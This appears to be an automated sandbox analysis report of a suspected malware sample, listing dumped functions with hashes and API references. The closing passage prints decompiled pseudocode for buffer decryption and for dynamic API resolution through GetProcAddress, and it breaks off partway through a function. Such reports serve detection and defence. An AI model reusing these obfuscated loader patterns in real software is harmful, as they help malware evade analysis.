Opcode Fuzzy Hash: 041ff6455c0835fd2a973ce38903d0b0227f93498b1e56b22412e75c0d9cb16f
Instruction Fuzzy Hash: 6401AD3190051AABCB05DFE4C944AEDB7B9BF85368F290809D4116B3C1DB70DA068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07615
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0761F
int.LIBCPMT ref: 6ED07636

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED07659
std::_Facet_Register.LIBCPMT ref: 6ED07670
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07690
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0769D

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 86f68de0dc6a2e9cb6fdc9bd79358a3303ec69edd855b9ef2814a01b6e49d6ac
Instruction ID: cbd747db11b235df133cdc6be31bb78ae7bff91bb1fecd345a3030cf743673f1
Opcode Fuzzy Hash: 86f68de0dc6a2e9cb6fdc9bd79358a3303ec69edd855b9ef2814a01b6e49d6ac
Instruction Fuzzy Hash: 4501C03190051AAFCF45DFE4C994AED7779BF85328F290909D4116B3C0DF709A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED077CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED077D4
std::_Lockit::_Lockit.LIBCPMT ref: 6ED077DE
int.LIBCPMT ref: 6ED077F5

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED07818
std::_Facet_Register.LIBCPMT ref: 6ED0782F
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED0784F
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0785C

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 62177e1da59e35e7d4d8d48bced17df2bd1d3ada145336b4656e47adf6b58ab6
Instruction ID: a3a52cabda7fbbaabd8209806ffa8a3395d4ec768264795bb80e1ed605317dc1
Opcode Fuzzy Hash: 62177e1da59e35e7d4d8d48bced17df2bd1d3ada145336b4656e47adf6b58ab6
Instruction Fuzzy Hash: C301C03590062AABCF05DFE0C945AED777ABF85728F180919D8206F2C0DF709A05CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED06FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED06FAE
std::_Lockit::_Lockit.LIBCPMT ref: 6ED06FB8
int.LIBCPMT ref: 6ED06FCF

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

codecvt.LIBCPMT ref: 6ED06FF2
std::_Facet_Register.LIBCPMT ref: 6ED07009
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07029
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07036

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 3bacffa86b603de58f5731db1fe75cc02dff181226217e381d0308412817b8ed
Instruction ID: 4b8cb69d57cc2452c9d061ee27270265a09c31b9f47b5b6828321692dc6052f2
Opcode Fuzzy Hash: 3bacffa86b603de58f5731db1fe75cc02dff181226217e381d0308412817b8ed
Instruction Fuzzy Hash: CA01803190451AABCF05DFE4C984AED7B7AAF85758F180909D4116B2C0DF71DA06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED06F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED06F19
std::_Lockit::_Lockit.LIBCPMT ref: 6ED06F23
int.LIBCPMT ref: 6ED06F3A

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

codecvt.LIBCPMT ref: 6ED06F5D
std::_Facet_Register.LIBCPMT ref: 6ED06F74
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED06F94
Concurrency::cancel_current_task.LIBCPMT ref: 6ED06FA1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 0edc18c11e0b2bffe686682b91f63963e81594f6d01018cf88e1e313176fe633
Instruction ID: a86f50bde04f8d9b9404c9a9621baab124d1882e95fd3c6c445850a75dd07041
Opcode Fuzzy Hash: 0edc18c11e0b2bffe686682b91f63963e81594f6d01018cf88e1e313176fe633
Instruction Fuzzy Hash: 8801C431914516DFCF05CFE0C954AEDBB796F85328F180809E4256B3D0DF749D458B61

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0773F
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07749
int.LIBCPMT ref: 6ED07760

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED07783
std::_Facet_Register.LIBCPMT ref: 6ED0779A
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED077BA
Concurrency::cancel_current_task.LIBCPMT ref: 6ED077C7

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 2f646f6ce55e332e836ece67941288ed36c72a1e5d48d7d0eac432c4b1b13450
Instruction ID: 946f2117eb7a2729a5f4e6c0d69ca90ae2172f07cdfdfd290153647b905c108b
Opcode Fuzzy Hash: 2f646f6ce55e332e836ece67941288ed36c72a1e5d48d7d0eac432c4b1b13450
Instruction Fuzzy Hash: 1B01AD3590051AABCB0ADFE4C945AEDB77AAF85358F18081AD8106B2C0DF709E058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01ADE
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01AE8
int.LIBCPMT ref: 6ED01AFF

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

ctype.LIBCPMT ref: 6ED01B22
std::_Facet_Register.LIBCPMT ref: 6ED01B39
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01B59
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01B66

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 09c00affa46bdbe032c1fe26e62ee9fa767aad443e446765ccef45526b251b70
Instruction ID: fb93dece336d212e5bff1c610265b93af1f59e4540455b27fbd1aa2e424a94bc
Opcode Fuzzy Hash: 09c00affa46bdbe032c1fe26e62ee9fa767aad443e446765ccef45526b251b70
Instruction Fuzzy Hash: B701C031D0461A9FCF05CFE4CA84AED777AAF5136CF280809D4106B2C0EF709A4A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07297
std::_Lockit::_Lockit.LIBCPMT ref: 6ED072A1
int.LIBCPMT ref: 6ED072B8

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

messages.LIBCPMT ref: 6ED072DB
std::_Facet_Register.LIBCPMT ref: 6ED072F2
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07312
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0731F

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 5b499b6317ea9893048f725223d60e0988f00f2a3b12ec6f68e986dcaabd7155
Instruction ID: 97b98d973e6352f2b6325846e1de46911bbce2c7330d0cffe2c314230d384d89
Opcode Fuzzy Hash: 5b499b6317ea9893048f725223d60e0988f00f2a3b12ec6f68e986dcaabd7155
Instruction Fuzzy Hash: 4001C03190451AAFCF05EFE0C954AED777AAF81328F280809D8116B2C0DF709A05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07ABD
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07AC7
int.LIBCPMT ref: 6ED07ADE

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

numpunct.LIBCPMT ref: 6ED07B01
std::_Facet_Register.LIBCPMT ref: 6ED07B18
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07B38
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07B45

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: bf2976225bd7dc5ac44d59e03b96267edf0bab52f08d9c2c429538ddc514c253
Instruction ID: 76755edd54e3bae2457863a322d969d5afdae216bbae10c4f824dd494840a710
Opcode Fuzzy Hash: bf2976225bd7dc5ac44d59e03b96267edf0bab52f08d9c2c429538ddc514c253
Instruction Fuzzy Hash: B201C07190061AAFCF05EFE4C984AEE777AAF85328F280909D4106B2C0DF70DA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01A49
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01A53
int.LIBCPMT ref: 6ED01A6A

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

codecvt.LIBCPMT ref: 6ED01A8D
std::_Facet_Register.LIBCPMT ref: 6ED01AA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01AC4
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01AD1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 00447fb4e993f6f436972847874a539597dacbbe5c4390e7e8e4c4c9d2240e7f
Instruction ID: e35fc424491f00aa2b3c2a3929eb1cb6747bb490bbf873745a04a138193dfdcc
Opcode Fuzzy Hash: 00447fb4e993f6f436972847874a539597dacbbe5c4390e7e8e4c4c9d2240e7f
Instruction Fuzzy Hash: E401C03190461ADFCF05CFE4C984AED77B9AF8532CF280809D4116B3C0DF709A4A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07B52
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07B5C
int.LIBCPMT ref: 6ED07B73

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

numpunct.LIBCPMT ref: 6ED07B96
std::_Facet_Register.LIBCPMT ref: 6ED07BAD
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07BCD
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07BDA

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: d9d3322fd0f16e6351116c63299aa87f12c9f4e5e9e3adafe2cbc5df6aa34efc
Instruction ID: 822d0a28ebc362916ab17640d453e6fc712c4d329ec59ff1ad3fee5f20e9fc98
Opcode Fuzzy Hash: d9d3322fd0f16e6351116c63299aa87f12c9f4e5e9e3adafe2cbc5df6aa34efc
Instruction Fuzzy Hash: 1E01803190051AAFCF05DFE4C955AEDB77AAF85328F188919E4116B2C0EF74DE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0732C
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07336
int.LIBCPMT ref: 6ED0734D

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

messages.LIBCPMT ref: 6ED07370
std::_Facet_Register.LIBCPMT ref: 6ED07387
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED073A7
Concurrency::cancel_current_task.LIBCPMT ref: 6ED073B4

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 0552655cb49b7ed3ff46c6552246d4023a9767416334fcd422891e65bef5b0b4
Instruction ID: b781fd9ec89954f1fd0d86010cb1cf496aa0c13464ab1aab9a0c76f3d169d3f8
Opcode Fuzzy Hash: 0552655cb49b7ed3ff46c6552246d4023a9767416334fcd422891e65bef5b0b4
Instruction Fuzzy Hash: 5401C031A0051AAFCF05EFE4C945AEDB779BF85318F18080AD8206B3C0DF70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED070D1, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED070D8
std::_Lockit::_Lockit.LIBCPMT ref: 6ED070E2
int.LIBCPMT ref: 6ED070F9

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

collate.LIBCPMT ref: 6ED0711C
std::_Facet_Register.LIBCPMT ref: 6ED07133
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07153
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07160

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
String ID:
API String ID: 1767075461-0
Opcode ID: 2c43ccfde3f58b2dc6974af69c3a259832db161cb88bc05908d0994110e95b69
Instruction ID: 790cae872160baf982fea5551dd2117feee5924fe2967340416f3e6e25512245
Opcode Fuzzy Hash: 2c43ccfde3f58b2dc6974af69c3a259832db161cb88bc05908d0994110e95b69
Instruction Fuzzy Hash: FC01803190462AEFCF05DFE4C945AEE777ABF85768F180919D4106B3C0DF709A058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07043
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0704D
int.LIBCPMT ref: 6ED07064

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

collate.LIBCPMT ref: 6ED07087
std::_Facet_Register.LIBCPMT ref: 6ED0709E
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED070BE
Concurrency::cancel_current_task.LIBCPMT ref: 6ED070CB

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
String ID:
API String ID: 1767075461-0
Opcode ID: aa9123236118108e350f52b06736c0798fed58d1b5eb79d87a0f1fdd197befa7
Instruction ID: 581c4981a389f504a888b981df2fa164a27c8fb7026a0472c04682c841d2cdc4
Opcode Fuzzy Hash: aa9123236118108e350f52b06736c0798fed58d1b5eb79d87a0f1fdd197befa7
Instruction Fuzzy Hash: 2301927190051A9FCF05DFE4C995AEEB77AAF85328F280909D4116B3C0DF70DA098BB2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED071FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07202
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0720C
int.LIBCPMT ref: 6ED07223

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

ctype.LIBCPMT ref: 6ED07246
std::_Facet_Register.LIBCPMT ref: 6ED0725D
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED0727D
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0728A

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 1aea2c0c6533e981040bbfbc7f7c57b807cf0dd1323357d26c9d8d23c88b41bb
Instruction ID: 324f4ed1622f1a37ec42d3f16a0612ea8b130139f8e0d734978f6f518d910820
Opcode Fuzzy Hash: 1aea2c0c6533e981040bbfbc7f7c57b807cf0dd1323357d26c9d8d23c88b41bb
Instruction Fuzzy Hash: 1601803190052A9FCF05DFE4DA54AED777ABF95328F184919E4116B2C0EF70DA06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0716D
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07177
int.LIBCPMT ref: 6ED0718E

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

ctype.LIBCPMT ref: 6ED071B1
std::_Facet_Register.LIBCPMT ref: 6ED071C8
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED071E8
Concurrency::cancel_current_task.LIBCPMT ref: 6ED071F5

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: bf3ecf9ceee56c323eafaff9c6d8448917ac1fefb02f3f505a170b6538347c74
Instruction ID: 19ead14b528dedd25a183171097229eadfb7531f9afd37f2e528ffa614c2f389
Opcode Fuzzy Hash: bf3ecf9ceee56c323eafaff9c6d8448917ac1fefb02f3f505a170b6538347c74
Instruction Fuzzy Hash: E2016D3190051AABCF059FE4C954AEDBB7AAF85728F184909D4106B2C0DF709A058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01666, Relevance: 9.4, APIs: 6, Instructions: 380memoryCOMMON

Download Yara Rule

APIs

_Allocate.LIBCONCRTD ref: 6ED01690
_Allocate.LIBCONCRTD ref: 6ED01702
_Allocate.LIBCONCRTD ref: 6ED01784
_Allocate.LIBCONCRTD ref: 6ED01846
_Allocate.LIBCONCRTD ref: 6ED018FD
_Allocate.LIBCONCRTD ref: 6ED0198D

Part of subcall function 6ECFE180: _Max_value.LIBCPMTD ref: 6ECFE1C3

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Allocate$Max_value
String ID:
API String ID: 4124748770-0
Opcode ID: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
Instruction ID: 56eedf2d2216e5d4377deb802f489e14ca73c27dc5173e983f513df9fd6b1105
Opcode Fuzzy Hash: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
Instruction Fuzzy Hash: BEC1C072900219FFDB04DFE9D8809DFBBBDEF46258B140999F814D7241E730EA018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00751A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00751AF6
SysAllocString.OLEAUT32(0070006F), ref: 00751B0A
SysAllocString.OLEAUT32(00000000), ref: 00751B1C
SysFreeString.OLEAUT32(00000000), ref: 00751B84
SysFreeString.OLEAUT32(00000000), ref: 00751B93
SysFreeString.OLEAUT32(00000000), ref: 00751B9E

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: c9b79717694b97d646e620bb27bfb40790de577cf6db2bc05e4c05ef7fde69b1
Instruction ID: c9ba40f4b9e24eadf329d28db2cfe4d8a93ef3b6c3e48b92c73b178c93ff34a7
Opcode Fuzzy Hash: c9b79717694b97d646e620bb27bfb40790de577cf6db2bc05e4c05ef7fde69b1
Instruction Fuzzy Hash: 50418E72900609AFDB02DFB8C844AEEB7B9EF49312F144466ED14EB160DAB59D09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00751C11, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00751C11(void* _a4, intOrPtr _a8, char _a12) {
				int _v12;
				signed int _v16;
				char _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E007575F6(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x75d310, 0x110);
					_t27 =  *0x75d314; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00759182(0x110, _a4, _a4, _t27, 0);
					}
					_t7 =  &_v36; // 0x75553a
					if(E00754BF7(_t7) != 0) {
						_t8 =  &_v36; // 0x75553a
						_t10 =  &_v20; // 0x75553a
						if(E00755E74(0x110, _a4, _t10,  &_v12, _t8, 0) == 0) {
							_t12 =  &_a12; // 0x75553a
							_t13 =  &_v20; // 0x75553a
							_t55 =  *_t13;
							_v36 =  *_t46;
							_v16 = E007516D9(_t55, _a8, _t51, _t46,  *_t12);
							_t18 =  &_v36; // 0x75553a
							 *((intOrPtr*)(_t55 + 4)) =  *_t18;
							_t20 =  &(_t46[4]); // 0x8b4875c6
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E00754AAB(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E00754AAB(_a4);
				}
				return _v16;
			}

0x00751c17
0x00751c1c
0x00751c29
0x00751c2c
0x00751c2f
0x00751c34
0x00751c39
0x00751c47
0x00751c4c
0x00751c51
0x00751c56
0x00751c58
0x00751c61
0x00751c61
0x00751c66
0x00751c70
0x00751c74
0x00751c7c
0x00751c8c
0x00751c90
0x00751c93
0x00751c93
0x00751c99
0x00751ca7
0x00751caa
0x00751cad
0x00751cb0
0x00751cbd
0x00751cc2
0x00751cc6
0x00751cc6
0x00751c8c
0x00751cd1
0x00751cdc
0x00751cdc
0x00751ce8

APIs

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

memcpy.NTDLL(00000000,00000110,00000002,00000002,0075553A,00000008,0075553A,0075553A,?,00755805,0075553A), ref: 00751C47
memset.NTDLL ref: 00751CBD
memset.NTDLL ref: 00751CD1

Strings

:Uu, xrefs: 00751C7C, 00751C93, 00751C7F, 00751CBC, 00751CC5
:Uu, xrefs: 00751C90
:Uu:Uu, xrefs: 00751C66, 00751C74, 00751CAA, 00751C77

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID: :Uu$:Uu$:Uu:Uu
API String ID: 1529149438-1772717490
Opcode ID: 18acf3bad6cc9e8bd2c5a730c3c501e434dde81208d53f427b833f650b95df7e
Instruction ID: 2ad1950eba65bc45c791844fd98c7e006ba7321f1cf582ceac1d44df2f571c98
Opcode Fuzzy Hash: 18acf3bad6cc9e8bd2c5a730c3c501e434dde81208d53f427b833f650b95df7e
Instruction Fuzzy Hash: B1216071A00618EBDB119B95CC86FEE7BB8AF08742F048015FD05EA241E7B8DA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00754837, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00754837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E007575F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x75d2e0; // 0x25ca5a8
					_t1 = _t23 + 0x75e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x75d2e0; // 0x25ca5a8
					_t2 = _t26 + 0x75e782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00754AAB(_t54);
					} else {
						_t30 =  *0x75d2e0; // 0x25ca5a8
						_t5 = _t30 + 0x75e76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
